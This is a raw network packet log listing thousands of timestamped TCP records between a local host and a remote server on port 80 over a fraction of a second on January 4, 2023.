Jan 4, 2023 16:47:45.259171963 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.259179115 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.259188890 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.259201050 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.259212971 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.259221077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.259229898 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.259242058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.259249926 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.259262085 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.259272099 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.259282112 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.259298086 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.259303093 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.259316921 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.259324074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.259346008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.259346962 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.259366989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.259368896 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.259387970 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.259391069 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.259423971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.259437084 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.259462118 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.259470940 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.259531975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.259557962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.259582996 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.259609938 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.259609938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.259634972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.259638071 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.259660006 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.259670973 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.259685993 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.259695053 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.259711027 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.259711981 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.259736061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.259756088 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.261917114 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.261940956 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.261960983 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.261981964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.261995077 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.262001038 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.262026072 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.262031078 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.262054920 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.262063026 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.262084007 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.262089014 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.262111902 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.262129068 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.262151003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.262161016 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.262161016 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.262191057 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.262192011 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.262212038 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.262217999 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.262239933 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.262248039 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.262269020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.262278080 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.262293100 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.262315989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.262345076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.262366056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.262393951 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.262969017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263004065 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263030052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263056993 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263077021 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.263092041 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263107061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.263114929 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263134956 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263142109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.263154984 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263171911 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.263180971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263196945 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.263210058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263226986 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.263247967 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263257027 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.263268948 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263288975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263307095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263315916 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.263333082 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263349056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.263361931 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263391972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263406038 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.263421059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263448000 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263467073 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263467073 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.263487101 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263492107 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.263506889 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263520002 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.263528109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263544083 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.263550043 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263560057 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.263577938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.263598919 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263603926 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.263715029 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263735056 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263753891 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263763905 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.263791084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263803005 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.263816118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263834000 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.263843060 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263864994 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.263870955 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263897896 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.263909101 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263911009 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.263927937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.263953924 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.263974905 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.264004946 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264034033 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264060974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264081001 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.264089108 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264111042 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.264117956 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264141083 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.264148951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264163971 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.264183998 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264211893 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264228106 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.264231920 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264252901 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264257908 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.264272928 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264288902 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.264295101 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264311075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.264314890 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264336109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264355898 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264368057 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.264375925 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264395952 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264396906 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.264396906 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.264417887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264431953 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.264437914 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264466047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264467955 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.264492035 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.264492989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264514923 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264520884 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.264535904 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264543056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.264565945 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.264588118 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.264857054 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264878035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264898062 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264918089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264940977 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264951944 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.264964104 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.264976978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.264987946 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.265011072 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.265016079 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.265034914 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.265036106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.265059948 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.265065908 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.265085936 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.265096903 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.265113115 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.265114069 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.265137911 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.265139103 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.265160084 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.265163898 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.265181065 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.265188932 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.265213013 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.265214920 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.265235901 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.265243053 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.265264034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.265284061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.265288115 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.265314102 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.265316010 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.265337944 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.265358925 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.265382051 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.265382051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.265398979 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.265434027 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.265832901 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.265888929 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.265918016 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.265947104 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.265974998 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.265985966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.266000986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.266032934 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.266048908 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.266062021 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.266077995 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.266092062 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.266108036 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.266123056 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.266134024 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.266153097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.266180992 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.266199112 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.266220093 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.266225100 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.266241074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.266261101 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.266278982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.266285896 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.266304970 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.266314030 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.266325951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.266345024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.266345978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.266366005 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.266377926 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.266386032 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.266405106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.266411066 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.266426086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.266438961 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.266444921 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.266469002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.266474009 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.266494989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.266504049 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.266522884 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.266535044 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.266551018 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.266560078 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.266572952 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.266602993 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.266978979 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.267011881 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.267039061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.267040968 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.267066002 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.267072916 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.267088890 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.267102003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.267133951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.267134905 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.267153978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.267158031 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.267174959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.267183065 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.267194986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.267206907 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.267215014 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.267220974 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.267235994 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.267244101 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.267256975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.267285109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.267292976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.267292976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.267313957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.267323971 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.267334938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.267342091 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.267359018 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.267379045 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.267388105 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.267401934 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.267421007 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.267424107 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.267441034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.267461061 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.267469883 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.267469883 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.267482996 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.267488003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.267508984 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.267517090 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.267530918 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.267545938 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.267573118 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.267616034 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.267961025 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.267982006 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.268001080 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.268018961 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.268022060 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.268045902 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.268076897 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.268138885 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.268250942 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.268269062 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.268282890 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.268296003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.268310070 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.268326998 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.268345118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.268378973 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.268382072 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.268403053 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.268412113 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.268421888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.268429995 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.268440962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.268460035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.268465042 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.268479109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.268496037 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.268497944 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.268517971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.268526077 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.268537045 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.268554926 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.268559933 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.268574953 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.268580914 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.268594980 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.268610001 CET	49696	80	192.168.2.4	66.235.200.147
